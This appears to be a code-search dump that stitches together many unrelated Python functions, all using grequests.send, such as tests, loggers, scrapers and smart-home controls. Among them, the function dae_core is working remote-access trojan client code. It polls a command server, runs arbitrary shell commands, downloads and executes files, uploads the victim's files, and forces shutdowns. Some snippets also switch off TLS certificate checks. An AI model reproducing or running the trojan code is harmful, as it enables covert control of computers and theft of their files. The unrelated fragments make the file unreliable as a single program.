def test_async_request_with_exception_handler(self):
    good_url = 'https://github.com'
    bad_url = 'http://bad.url'
    timeout = 3
    flag = {}

    def response_handler(response, **kwargs):
        flag['ok'] = True

    def exception_handler(req, exc):
        flag['error'] = True

    req = grequests.get(good_url, callback=response_handler,
                        exception_handler=exception_handler)
    flag['ok'] = False
    flag['error'] = False
    grequests.send(req)
    time.sleep(timeout)
    self.assertTrue(flag['ok'])
    self.assertFalse(flag['error'])

    req = grequests.get(bad_url, callback=response_handler,
                        exception_handler=exception_handler)
    flag['ok'] = False
    flag['error'] = False
    grequests.send(req)
    time.sleep(timeout)
    self.assertFalse(flag['ok'])
    self.assertTrue(flag['error'])
def createPoint(x, y):
    r = grequests.post('http://api.sconce.dev/jobs/1/points.json',
                       data={'x': x, 'y': y})
    grequests.send(r, grequests.Pool(10))
def emit(self, record):
    if record.levelno != logging.getLevelName("METRIC"):
        return
    try:
        metric_data = json.loads(record.getMessage())
        metric_name = metric_data.pop("metric_name")
        value = metric_data.pop("value")
        additional_tags = ["service_name", "service_shard"]
        for tag in additional_tags:
            tag_value = getattr(record, tag, None)
            if tag_value is not None and tag not in metric_data:
                metric_data[tag] = tag_value
        tags = ["%s=%s" % (str(a), str(b).replace(' ', '\ '))
                for a, b in metric_data.iteritems()]
        metric_id = ",".join([metric_name] + tags)
        timestamp = int(record.created * 1000 * 1000 * 1000)
        metric_data_string = "%s value=%s %s" % (metric_id, str(value),
                                                 str(timestamp))
        normal_logger = logging.getLogger()
        normal_logger.debug(metric_data_string)
        request = grequests.post(
            url=self.metric_server,
            data=metric_data_string,
        )
        grequests.send(request)
    except KeyError:
        pass
    except:
        self.handleError(record)
def _handle_groupchat_message(self, msg):
    """Handles messages received from group chat"""
    chatrooms = self._storage.get_chatrooms()
    try:
        data = chatrooms[msg['mucroom']]
        # create message
        message = {
            'from': unicode(msg['mucnick']),
            'room': unicode(msg['mucroom']),
            'text': msg['body'],
            'received': datetime.now()
        }
        postdata = {k: http_additional_serialize(v)
                    for k, v in message.iteritems()}
        # send message to postback_url
        try:
            r = grequests.post(data['url'], data=postdata)
            grequests.send(r)
        except TypeError:
            pass
    except KeyError:
        pass
def push(key, payload, pool):
    # logging.debug("+++++ Pushing: " + key + "\n")
    # TODO fetch date of resource somehow, otherwise server will use its own time
    params = {'key': key}
    # asynchronous PUT request
    req = grequests.put(apiURI, params=params, headers=header, data=payload,
                        hooks={'response': printResponse})
    grequests.send(req, pool)
def tools_send_door_state(self):
    print("Updating Jeedom")
    req = grequests.get(
        "%s%s%s" % (self.CONF["JEEDOM"]["PROTOCOL"],
                    self.CONF["JEEDOM"]["HOST"],
                    self.CONF["JEEDOM"]["API_URL"].replace(
                        "{key}", self.CONF["JEEDOM"]["API_KEY"]).replace(
                        "{id}", self.CONF["JEEDOM"]["CMD_ID"][self.door_state])))
    grequests.send(req, grequests.Pool(1))
def append_comments(parent):
    if "kids" in parent:
        pool = grequests.Pool(100)
        for i, kid_id in enumerate(parent["kids"]):
            kid_url = "{}{}.json".format(api_item_url, kid_id)
            request = grequests.get(kid_url, hooks={
                "response": append_decorator(append_comment, parent, i)
            })
            grequests.send(request, pool)
        pool.join()
def get_request(url, auth, headers=None):
    tx = ty = 1
    while True:
        try:
            request = grequests.get(url, auth=auth, headers=headers,
                                    session=SESSION)
            grequests.send(request, POOL).join()
            r = request.response
        except:
            pass
        else:
            break
        # Retry with Fibonacci backoff (1, 1, 2, 3, 5, ... seconds)
        sleep(tx)
        tx, ty = ty, tx + ty
    return r
def answer_received(self, data):
    question, answer = data
    log.debug('Answer received: %s' % repr(answer))
    # send answer to `postback_url`
    try:
        if question['postback_url']:
            # serialize values inside the dictionary
            postdata = {k: http_additional_serialize(v)
                        for k, v in answer.iteritems()}
            r = grequests.post(question['postback_url'], data=postdata)
            grequests.send(r)
    except KeyError:
        pass
def queue_fetch_image(self, iword, words):
    cached, url, destpath = self.fetcher.create_request(words[iword])
    if cached:
        self.add_to_fetched(AsyncImageFetcher.RequestedImage(
            None, iword, destpath, words))
    else:
        # put the request in a structure with the word and extra data
        if url not in self.requests:
            req = grequests.get(url, timeout=BingImageFetcher.TIMEOUT,
                                hooks={'response': [self.on_response]})
            self.requests[url] = AsyncImageFetcher.RequestedImage(
                req, iword, destpath, words)
            grequests.send(req, grequests.Pool(1))
def log_requests_response(es_url, response):
    """
    Log the response from a FHIR query.

    Args:
        es_url (string): The ElasticSearch endpoint.
        response (requests.models.Response): The response to log.
    """
    payload = {
        'request': _clean(response.request),
        'response': _clean(response),
        'now': datetime.datetime.now().isoformat(),
    }
    # Use the asynchronous grequests library because we don't need a response.
    req = grequests.post(es_url, data=json.dumps(payload))
    grequests.send(req)
def test_fetch_cards_sending_requests_by_batches_not_blocking_for_responses():
    """
    Send requests but don't block for the responses.
    Use a request pool to cap the number of in-flight requests.
    Use a callback to get notified of each response.
    """
    urls = [mtgurl.make_vanilla_url(cardname) for cardname in CARDS]
    reqs = (grequests.head(url, allow_redirects=True, callback=_on_response)
            for url in urls)
    pool = grequests.Pool(30)
    for req in reqs:
        grequests.send(req, pool)
    # Don't exit until we have received the responses, otherwise we may lose some of them
    import time
    time.sleep(20)
def make_requests_r(self, rlist, count=0):
    failed = []
    if count < 1:
        pool = grequests.Pool(self.limit)
    elif count < 2:
        time.sleep(10)
        pool = grequests.Pool(self.limit / 2)
        # NOTE: originally a bare generator expression, which never ran;
        # an explicit loop actually re-issues the requests.
        for r in rlist:
            r.rerequest()
    elif count < 3 or count > 3:
        time.sleep(10)
        pool = grequests.Pool(1)
        for r in rlist:
            r.rerequest()
    # Hack to turn off ssl certs
    for r in rlist:
        r.request.session.verify = False
    jobs = [grequests.send(r.request, pool, stream=False) for r in rlist]
    grequests.gevent.joinall(jobs)
    for r in rlist:
        if not r.response:
            print "Request: " + r.url + " failed[" + str(count) + "]"
            failed.append(r)
    return failed
def _handle_requests(
    self,
    tasks: Iterable[AzureLogRecord],
    stream: bool = False,
    exception_handler: Callable = None,
    gtimeout: Optional[int] = None,
) -> None:
    """Concurrently handles a collection of AzureLogRecords, converting their requests to responses.

    :param tasks: a collection of AzureLogRecord objects.
    :param stream: if True, the content will not be downloaded immediately.
    :param exception_handler: callback function, called when an exception occurs. Params: Request, Exception.
    :param gtimeout: gevent joinall timeout in seconds. (Note: unrelated to requests timeout.)
    """
    tasks = list(tasks)
    pool = grequests.Pool(self._configuration.max_concurrent_requests)
    jobs = [grequests.send(rec.log_request, pool, stream=stream) for rec in tasks]
    grequests.gevent.joinall(jobs, timeout=gtimeout)
    for record in tasks:
        if record.log_request.response is not None:
            record.log_response = record.log_request.response
        elif exception_handler and hasattr(record.log_request, "exception"):
            record.log_response = exception_handler(record.log_request,
                                                    record.log_request.exception)
        else:
            record.log_response = None
def map(requests, stream=False, size=None, exception_handler=None,
        gtimeout=None, success_handler=None):
    """Concurrently converts a list of Requests to Responses.

    :param requests: a collection of Request objects.
    :param stream: if True, the content will not be downloaded immediately.
    :param size: specifies the number of requests to make at a time. If None, no throttling occurs.
    :param exception_handler: callback function, called when an exception occurs. Params: Request, Exception.
    :param gtimeout: gevent joinall timeout in seconds. (Note: unrelated to requests timeout.)
    :param success_handler: callback function, called on success. Params: Request.
    """
    requests = list(requests)
    pool = grequests.Pool(size) if size else None
    jobs = [grequests.send(r, pool, stream=stream) for r in requests]
    grequests.gevent.joinall(jobs, timeout=gtimeout)
    ret = []
    for request in requests:
        if request.response is not None:
            ret.append(request.response)
            if success_handler:
                success_handler(request)
        elif exception_handler and hasattr(request, 'exception'):
            ret.append(exception_handler(request, request.exception))
        else:
            ret.append(None)
    return ret
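A minimal usage sketch for the map() helper above; the URLs and both handlers are hypothetical, and grequests.get is assumed to build an unsent AsyncRequest as in the standard grequests package:

# Hypothetical handlers and URLs, for illustration only.
import grequests

def on_success(request):
    print('succeeded:', request.url)

def on_error(request, exception):
    print('failed:', request.url, exception)
    return None  # becomes this request's entry in the returned list

reqs = [grequests.get(u) for u in ('https://example.com', 'https://example.org')]
responses = map(reqs, size=2, exception_handler=on_error, success_handler=on_success)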
def fetch_address(self, uprn):
    print('fetching address ' + uprn)
    address_req = grequests.get(
        'https://address.discovery.openregister.org/record/%s.json' % uprn)
    address_resp = grequests.send(address_req, self.pool).get().response
    if address_resp.status_code == 404:
        print("WARNING: uprn %s resulted in 404" % uprn)
        return
    address = address_resp.json()
    print('fetching street ' + address['street'])
    street_req = grequests.get(
        'https://street.discovery.openregister.org/record/%s.json' % address['street'])
    street = grequests.send(street_req, self.pool).get().response.json()
    address['street'] = street
    return address
def send_alarm_off():
    global last_sent_status_was_on
    if last_sent_status_was_on:
        print("Alarm OFF")
        _ = grequests.send(grequests.get(f"https://{IP}/off"), grequests.Pool(1))
        last_sent_status_was_on = False
def send_alarm_on():
    global last_sent_status_was_on
    if not last_sent_status_was_on:
        print("Alarm ON")
        _ = grequests.send(grequests.get(f"https://{IP}/on"), grequests.Pool(1))
        last_sent_status_was_on = True
def log_extra_data(self, params, campaign, request, to_phone, call_index):
    debug_mode = self.debug_mode

    def finished(res, **kwargs):
        if debug_mode:
            print "FFTF Extra Data log call complete: %s" % res

    ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest()
    user_phone = params.get('userPhone', None)
    org = params.get('org', 'fftf')
    if not user_phone:
        user_phone = request.values.get('From', '+15555555555')[-10:]

    data = {
        'key': self.api_key,
        'campaign_id': campaign['id'],
        'from_phone_number': string.replace(user_phone, "-", ""),
        'to_phone_number': string.replace(to_phone, "-", ""),
        'ip_address': ip,
        'call_index': call_index,
        'org': org
    }

    if self.debug_mode:
        print "FFTF Log Extra Data sending: %s" % data

    url = 'https://queue.fightforthefuture.org/log_phone_call'
    req = grequests.post(url, data=data, hooks=dict(response=finished))
    job = grequests.send(req, grequests.Pool(self.pool_size))
    return
def log_extra_data(self, params, campaign, request, to_phone, call_index):
    debug_mode = self.debug_mode

    def finished(res, **kwargs):
        if debug_mode:
            print "FFTF Extra Data log call complete: %s" % res

    ip = hashlib.sha256(request.values.get("ip_address", "")).hexdigest()
    user_phone = params.get('userPhone', None)
    if not user_phone:
        user_phone = request.values.get('From', '+15555555555')[-10:]

    data = {
        'key': self.api_key,
        'campaign_id': campaign['id'],
        'from_phone_number': string.replace(user_phone, "-", ""),
        'to_phone_number': string.replace(to_phone, "-", ""),
        'ip_address': ip,
        'call_index': call_index
    }

    if self.debug_mode:
        print "FFTF Log Extra Data sending: %s" % data

    url = 'https://queue.fightforthefuture.org/log_phone_call'
    req = grequests.post(url, data=data, hooks=dict(response=finished))
    job = grequests.send(req, grequests.Pool(self.pool_size))
    return
def recognize(self, trigger_id, audio_data):
    url = 'https://api.wit.ai/speech?v=20160526'
    headers = {'Authorization': 'Bearer ' + self.access_token,
               'Content-Type': _CONTENT_TYPE}
    callback = lambda r, *args, **kwargs: self.response_callback(
        trigger_id, r, *args, **kwargs)
    hooks = {'response': [callback]}
    req = grequests.post(url, headers=headers, data=audio_data,
                         hooks=hooks, timeout=10)
    job = grequests.send(req, self.request_pool)
    self.logger.debug("request sent")
def teardown_request(self, exception):
    # Send stathat requests only if there were no unhandled exceptions
    if exception:
        return

    # Send stathat requests
    req = dict(
        ezkey=self.ez_key,
        data=g._stathat_data,
    )
    if use_grequests:
        requests.send(requests.post(
            self.url,
            data=json.dumps(req),
            session=self.session,
        ))
    else:
        self.session.post(self.url, data=json.dumps(req))
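The snippet above relies on module-level names that are not shown. One plausible setup, assuming the grequests package; this is an assumption about the surrounding module, not code from the source:

try:
    # Alias grequests to `requests`, so requests.post()/requests.send()
    # above are the async variants (assumption, not from the source).
    import grequests as requests
    use_grequests = True
except ImportError:
    use_grequests = False  # fall back to the synchronous self.session.post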
def create_database(self, dbname, stream=False, size=None):
    r = requests.post(self.db_url(''), data={'db-name': dbname})
    if gevent:
        pool = Pool(size) if size else None
        jobs = [requests.send(r, pool, stream=stream)]
        gevent.joinall(jobs)
        r = r.response
    assert r.status_code in (200, 201), r.text
    return Database(dbname, self)
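The Datomic-style client methods here and below branch on a module-level `gevent` name. A plausible optional-import setup; an assumption, not code from the source:

try:
    import gevent
    from gevent.pool import Pool
    import grequests as requests  # requests.post()/requests.send() become async
except ImportError:
    gevent = None  # the `if gevent:` blocks are then skipped
    import requests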
def entity(self, dbname, eid, stream=False, size=None):
    r = requests.get(self.db_url(dbname) + '/-/entity',
                     params={'e': eid},
                     headers={'Accept': 'application/edn'})
    if gevent:
        pool = Pool(size) if size else None
        jobs = [requests.send(r, pool, stream=stream)]
        gevent.joinall(jobs)
        r = r.response
    assert r.status_code == 200
    return loads(r.content)
def req_task(self, trigger_id, text):
    url = 'https://api.wit.ai/message?v=20160526&q=' + quote(text)
    self.logger.debug('request URL=%s' % url)
    headers = {'Authorization': 'Bearer ' + self.access_token}
    callback = lambda r, *args, **kwargs: self.response_callback(
        trigger_id, r, *args, **kwargs)
    hooks = {'response': [callback]}
    req = grequests.get(url, headers=headers, hooks=hooks, timeout=10)
    job = grequests.send(req, self.request_pool)
    time.sleep(5)  # FIXME: necessary to receive response callback
def transact(self, dbname, data, stream=False, size=None):
    data = '[%s\n]' % '\n'.join(data)
    r = requests.post(self.db_url(dbname) + '/',
                      data={'tx-data': data},
                      headers={'Accept': 'application/edn'})
    if gevent:
        pool = Pool(size) if size else None
        jobs = [requests.send(r, pool, stream=stream)]
        gevent.joinall(jobs)
        r = r.response
    assert r.status_code in (200, 201), (r.status_code, r.text)
    return loads(r.content)
def turnLightOff(self, deviceId):
    # The grequests library sends the request as soon as we create "job" below.
    # We then yield to the greenlet every hundredth of a second in the main
    # update method to ensure we capture the result.
    req = grequests.put(
        'http://{ip}/api/{username}/lights/{devId}/state'.format(
            ip=hub['IP'], username=hub['username'], devId=deviceId),
        callback=printStatus,
        data='{"on":false}',
        timeout=4)
    job = grequests.send(req, grequests.Pool(1))
    job.link_exception(lambda *kwargs: sys.stdout.write(
        "There was an exception with the Hue request"))
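The comment in turnLightOff refers to yielding in a main update method; a sketch of what that could look like, assuming a gevent-based loop (hypothetical, not code from the source):

import gevent

def update(self):
    # Yield to the gevent hub for a hundredth of a second so the greenlet
    # spawned by grequests.send can run and deliver its callback or exception.
    gevent.sleep(0.01)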
def fetch(self, url=''):
    """
    Main method for the retriever class. It loads a URL and delegates
    processing of the response to another method.

    :param url: the URL that is going to be retrieved
    :return: the task (grequests.send response) to be evaluated if needed
    """
    self.print("Retrieving data from url: '{url}'".format(url=url))
    if url:
        request = grequests.get(url, hooks=dict(response=self.process_response))
        task = grequests.send(request, self.pool)
        return task
def get_player_rsp(player_urls):
    player_rsp_pool = grequests.Pool(len(player_urls))
    for player_url in player_urls:
        player_url = player_url.strip()  # remove the newline at the end
        # fetch player_id for this guy
        player_id = re.findall(r'\d+', player_url)[0]
        # fetch RSP using sale URL
        sale_url = "http://hitwicket.com/player/sell/{0}".format(player_id)
        req = grequests.get(
            sale_url,
            headers=headers,
            cookies=cookies,
            hooks={'response': [parse_rsp_factory(player_url=player_url)]})
        grequests.send(req, player_rsp_pool)
    print "waiting for responses for 5 seconds..."
    time.sleep(5)
    return player_rsp
def turnLightOff(self, deviceId):
    # The grequests library sends the request as soon as we create "job" below.
    # We then yield to the greenlet every hundredth of a second in the main
    # update method to ensure we capture the result.
    base64string = base64.encodestring(
        '%s:%s' % (hub['username'], hub['password'])).replace('\n', '')
    req = grequests.get(
        'http://{ip}/3?0262{devId}0F13FF=I=3'.format(ip=hub['IP'],
                                                     devId=deviceId),
        callback=printStatus,
        timeout=4,
        headers={"Authorization": "Basic %s" % base64string})
    job = grequests.send(req, grequests.Pool(1))
    job.link_exception(lambda *kwargs: sys.stdout.write(
        "There was an exception with the Insteon request"))
def handler(response, *args, **kwargs):
    if response.status_code != 200:
        # Need to track redirects to determine which query originated the response.
        # The name of the beer could be extracted from the final page but the
        # exact name may differ, which will cause issues as the name is used as
        # a dictionary key.
        if not full_url_re.match(response.headers['Location']):
            location = urllib.parse.urljoin(domain, response.headers['Location'])
        else:
            location = response.headers['Location']
        redirects[location] = response.url
        return

    if not landed_on_profile(response):
        print("landed on search page: URL:", response.url)
        profile_urls = profile_url_re.findall(response.text)  # TODO
        if profile_urls:
            # Naively choose profile from results
            profile_url = profile_urls[0]
            if not full_url_re.match(profile_url):
                location = urllib.parse.urljoin(domain, profile_url)
            else:
                location = profile_url
            redirects[location] = response.url
            req = grequests.get(urllib.parse.urljoin(domain, profile_url),
                                callback=handler)
            to_fetch.append(grequests.send(req))
        else:
            og_url = reverse_redirects(response.url)
            parsed = urllib.parse.urlparse(og_url)
            q = urllib.parse.parse_qs(parsed.query)['q'][0]
            no_results.append(q)
    else:
        print("landed on profile: URL:", response.url)
        score = parse_rating(response)
        brewery = parse_brewery(response)
        og_url = reverse_redirects(response.url)
        parsed = urllib.parse.urlparse(og_url)
        q = urllib.parse.parse_qs(parsed.query)['q'][0]
        global ratings
        beer = next(b for b in ratings if b['clean_text'] == q)
        beer["link"] = response.url
        beer["rating"] = score
        beer["rating_count"] = parse_rating_count(response)
        beer["brewery"] = brewery
        beer["name"] = parse_name(response)
        beer["style"] = parse_style(response)
def create_index(self, raw_sentences_fpath, output_fpath):
    num = 0
    req_nmbr = 0
    output_f = codecs.open(output_fpath, "w", "utf-8")
    with codecs.open(raw_sentences_fpath, "r", "utf-8") as input_f:
        for i, line in enumerate(input_f):
            if True:  # NOTE: hard-coded guard; the elif below is dead code
                if i % BATCH_SIZE == 0 and i != 0:
                    print('{} Request'.format(i))
                    output_f.close()
                    self.create_request(output_fpath)
                    output_f = codecs.open(output_fpath, "w", "utf-8")
                    num = 0
                    if len(self._requests) == FIRE_AFTER:
                        # resp = grequests.imap(self._requests, exception_handler=self.e_handler)
                        # for response in resp:
                        #     print(response.status_code)
                        for i, req in enumerate(self._requests):  # NOTE: shadows outer i
                            print('{} Request {}'.format(
                                req_nmbr,
                                str(datetime.now().strftime('%H:%M'))))
                            req_nmbr = req_nmbr + 1
                            grequests.send(req, POOL)
                        # print(resp)
                        self._requests = []
                print(self._get_meta(), file=output_f)
                print(self._create_document(line), file=output_f)
                num += 1
            elif i % (BATCH_SIZE * 10) == 0:
                print('Skipped {}/{} ({:2.2f})'.format(i, START_INDEX,
                                                       (i / START_INDEX)))
                print("*")
    self.create_request(output_fpath)
    output_f.close()
def query(self, dbname, query, extra_args=[], history=False,
          stream=False, size=None):
    args = '[{:db/alias ' + self.storage + '/' + dbname
    if history:
        args += ' :history true'
    args += '} ' + ' '.join(str(a) for a in extra_args) + ']'
    r = requests.get(urljoin(self.location, 'api/query'),
                     params={'args': args, 'q': query},
                     headers={'Accept': 'application/edn'})
    if gevent:
        pool = Pool(size) if size else None
        jobs = [requests.send(r, pool, stream=stream)]
        gevent.joinall(jobs)
        r = r.response
    assert r.status_code == 200, r.text
    return loads(r.content)
def async_request(handler_name):
    global outstanding
    r = grequests.post('http://%s:8080/runLambda/%s' % (config['host'], handler_name),
                       headers=HEADERS,
                       data=json.dumps({"name": "Alice"}),
                       hooks=dict(response=async_response))
    job = grequests.send(r, grequests.Pool(1))
    with async_lock:
        outstanding += 1
    return
def make_request(self, value="", case=None, rval=None, debug=False):
    '''
    Make a request. The value specified will be compiled/rendered into all
    Query objects in the request. If case and rval are specified, the
    response will be appended to the list of values for the specified case.

    If return_case is True, we return the case rather than the rval; this is
    only really used for recursing by _test in the case of an error. Depth
    keeps track of recursion depth when we make multiple requests after a
    failure.
    '''
    new_request = copy(self.request)
    # Iterate over the __dict__ of the request and compile any elements
    # that are Query objects.
    for elt in [q for q in new_request.__dict__
                if isinstance(new_request.__dict__[q], Query)]:
        opts = new_request.__dict__[elt].get_options()
        for opt in opts:
            opts[opt] = value
        new_request.__dict__[elt].set_options(opts)
        new_request.__dict__[elt] = new_request.__dict__[elt].render()
        if debug:
            print "Injecting into '%s' parameter" % elt
            print "It looks like this: %s" % new_request.__dict__[elt]

    # Send request.
    glet = grequests.send(new_request)
    glet.join()
    if not glet.get() and type(new_request.response.error) is requests.exceptions.ConnectionError:
        raise utilities.SendRequestFailed("looks like you have a problem")

    # See if the response was 'true'
    if case is None:
        case = self._test(new_request.response)
    rval = self.cases[case]['rval']
    if debug and case:
        print "we will be treating this as a '%s' response" % case
        print "for the sample requests, the response's '%s' were the following :\n\t%s" % (self.comparison_attr, self.cases[case]['values'])
        print "\n"
    self._process_response(case, rval, new_request.response)
    return self.cases[case]['rval']
def get_async_web_response(url, method='GET', params=None, headers=None,
                           encode=False, verify=None, use_verify=False,
                           callback=None):
    import grequests
    # Build an async request matching the requested method:
    response = None
    request = None
    try:
        if 'POST' == method:
            if use_verify:
                request = grequests.post(url, data=params, headers=headers,
                                         verify=verify, callback=callback)
            else:
                request = grequests.post(url, data=params, headers=headers,
                                         callback=callback)
        else:
            # NOTE: the original called requests.get here, which does not
            # accept a callback; grequests.get matches the rest of the function.
            request = grequests.get(url, data=params, headers=headers,
                                    callback=callback)
        if request:
            response = grequests.send(request, grequests.Pool(1))
            return response
        else:
            return response
    except:
        return response
def post_to_leaderboard(self, fftf_campaign, stat, data, host, session):
    debug_mode = self.debug_mode

    def finished(res, **kwargs):
        if debug_mode:
            print "FFTF Leaderboard call complete: %s" % res

    data = {
        'campaign': fftf_campaign,
        'stat': stat,
        'data': data,
        'host': host,
        'session': session
    }

    if self.debug_mode:
        print "FFTF Leaderboard sending: %s" % data

    url = 'https://leaderboard.fightforthefuture.org/log'
    req = grequests.post(url, data=data, hooks=dict(response=finished))
    job = grequests.send(req, grequests.Pool(self.pool_size))
    return
def _request(self, url, callback, pool):
    req = grequests.get(url, hooks=dict(response=callback), verify=False)
    grequests.send(req, pool)
def dae_core():
    global working_directory1
    global caesar_folder
    global delay

    handshake_req()
    no_response = 0
    subprocesses = []

    while 1:
        # Checking if some subprocess has terminated
        if subprocesses != []:
            non_terminated = []
            for process in subprocesses:
                # If the process has terminated:
                if process[0].poll() is not None:
                    out = process[0].stdout.read()
                    err = process[0].stderr.read()
                    output = err if err != '' else out
                    command = process[1]['command']
                    task_id = process[1]['task_id']
                    working_directory1 = process[1]['wd']
                    r = requests.post(caesar_folder + '/target/output.php',
                                      data={'unique_id': unique_id,
                                            'command': command,
                                            'task_id': task_id,
                                            'output': output,
                                            'wd': quote(working_directory1)})
                else:
                    non_terminated.append(process)
            subprocesses = non_terminated
            non_terminated = []

        # Check if there are new commands to execute
        r = requests.post(caesar_folder + '/target/tasks.php',
                          data={'unique_id': unique_id})
        response = r.text

        # If the response from the server is not empty
        if response != '':
            # Splitting the response in order to get a list of commands to
            # execute (and their identifiers)
            commands = split_response(response, '<command>', '</command>')
            ids = split_response(response, '<task_id>', '</task_id>')

            # Executing all commands contained in the list
            for command, task_id in zip(commands, ids):
                # If the user wants a remote pseudo-connection
                if command == 'connect':
                    delay = 1
                    output = 'connected'
                elif command == 'exit':
                    delay = 10
                    output = 'exit'
                elif command == 'help':
                    shell_help_link = caesar_folder + '/shell_help.txt'
                    help_result = requests.get(shell_help_link).text
                    output = help_result
                elif command == 'shutdown':
                    subprocess.call('shutdown -s -t 5 -f', shell=True)
                    output = '[*] Target PC will shutdown in 5 sec.'
                elif command == 'restart':
                    subprocess.call('shutdown -r', shell=True)
                    output = '[*] Target PC will restart in 5 sec.'
                elif command == 'logoff':
                    subprocess.call('shutdown -l', shell=True)
                    output = '[*] Target PC will log off in 5 sec.'
                elif command.startswith('show.'):
                    current_user = getpass.getuser()
                    to_show = command.split('.')
                    subprocess.call('msg ' + current_user + ' ' + to_show[1], shell=True)
                    output = '[*] The message will be shown to the victim for 60 sec.'
                elif command.startswith('cd '):
                    try:
                        directory = command.replace('cd ', '')
                        os.chdir(directory)
                        working_directory1 = os.getcwd()
                        output = ''
                    except OSError as e:
                        output = e.strerror + "\n"
                elif command.startswith('download_from_web '):
                    link_to_down = command.split(' ')
                    download_link = link_to_down[1]
                    downloaded_file = download_file(download_link)
                    output = '[*] ' + downloaded_file + ' is downloaded.'
                elif command.startswith('dae '):
                    link_to_down = command.split(' ')
                    download_link = link_to_down[1]
                    downloaded_file = download_file(download_link)
                    working_directory1 = os.getcwd()
                    file_to_execute = working_directory1 + '\\' + downloaded_file
                    subprocess.call(file_to_execute, shell=True)
                    output = '[*] ' + file_to_execute + ' is executed.'
                # If the attacker wants the victim to upload a file to the remote server
                elif command.startswith('download '):
                    filename = command.replace('download ', '')
                    if os.path.isfile(filename):
                        files = {'file_to_upload': open(filename, 'rb')}
                        # Start the upload without blocking the process
                        r = grequests.post(caesar_folder + '/target/upload.php',
                                           data={'unique_id': unique_id,
                                                 'command': command,
                                                 'task_id': task_id},
                                           files=files)
                        job = grequests.send(r, grequests.Pool(1))
                        output = 'The file is being uploaded to the server'
                    else:
                        output = 'Inexistent file..'
                else:
                    if os.name == 'nt':
                        process = subprocess.Popen(command.split(),
                                                   stdout=subprocess.PIPE,
                                                   stderr=subprocess.PIPE,
                                                   stdin=subprocess.PIPE,
                                                   shell=True)
                    else:
                        process = subprocess.Popen([command],
                                                   stdout=subprocess.PIPE,
                                                   stderr=subprocess.PIPE,
                                                   stdin=subprocess.PIPE,
                                                   shell=True,
                                                   close_fds=True)
                    # Time for the subprocess to spawn
                    sleep(0.5)
                    # If the execution of the process has terminated immediately
                    if process.poll() is not None:
                        out = process.stdout.read()
                        err = process.stderr.read()
                        output = err if err != '' else out
                    # Else add the process to the list of non-terminated subprocesses
                    else:
                        new_subprocess = []
                        # Appending to the list of subprocesses the instance of subprocess
                        new_subprocess.append(process)
                        # Appending a dictionary containing metadata of the process
                        new_subprocess.append({'command': command,
                                               'task_id': task_id,
                                               'wd': working_directory1}.copy())
                        subprocesses.append(new_subprocess)
                        output = 'executing'

                # Send the output to the server
                r = requests.post(caesar_folder + '/target/output.php',
                                  data={'unique_id': unique_id,
                                        'command': command,
                                        'task_id': task_id,
                                        'output': output,
                                        'wd': quote(working_directory1)})
            sleep(delay)
        else:
            # If the attacker is running a pseudo-interactive shell and is
            # not issuing commands
            if delay != 10:
                # Increment the number of no-responses
                no_response += 1
                # If there are too many no-responses from the server, reset
                # the delay (close the interactive shell)
                if no_response == 60:
                    delay = 10
                    no_response = 0
            sleep(delay)
def pushWithFile(key, filePath, pool):
    params = {'key': key}
    req = grequests.put(apiURI, params=params, headers=header,
                        data=open(filePath, 'rb'),
                        hooks={'response': printResponse})
    grequests.send(req, pool)
def async_acquire_current_image(cam_url, save_path):
    print("Async call to {}".format(cam_url))
    req = grequests.get(cam_url, hooks=dict(response=make_callback(save_path)))
    glet = grequests.send(req, grequests.Pool(50))
    glet.run()
    return glet
def notifyPutResponse(response, *args, **kwargs):
    print('PUT response:', response.text)


update_period = 0.25
last_master_update = 0
last_locator_update = 0
# Thank you https://stackoverflow.com/questions/16015749/in-what-way-is-grequests-asynchronous
s = grequests.Session()

while True:
    if time.time() > last_locator_update + update_period:
        last_locator_update = time.time()
        url = gpsUrl + "/api/v1/position/global"
        print('requesting data from', url)
        request = grequests.get(url, session=s,
                                hooks={'response': processLocatorPosition})
        job = grequests.send(request)

    if time.time() > last_master_update + update_period:
        last_master_update = time.time()
        url = gpsUrl + "/api/v1/position/master"
        print('requesting data from', url)
        request = grequests.get(url, session=s,
                                hooks={'response': processMasterPosition})
        job = grequests.send(request)

    try:
        datagram = sockit.recvfrom(4096)
        recv_payload = json.loads(datagram[0])
        # Send depth/temp to external/depth api
        ext_depth = {}
        ext_depth['depth'] = max(min(100, recv_payload['depth']), 0)
def crawlURL(self, url):
    headers = {'User-Agent': random.choice(UserAgents)}
    req = grequests.get(url, headers=headers,
                        hooks=dict(response=self.done_loading))
    grequests.send(req, grequests.Pool(1))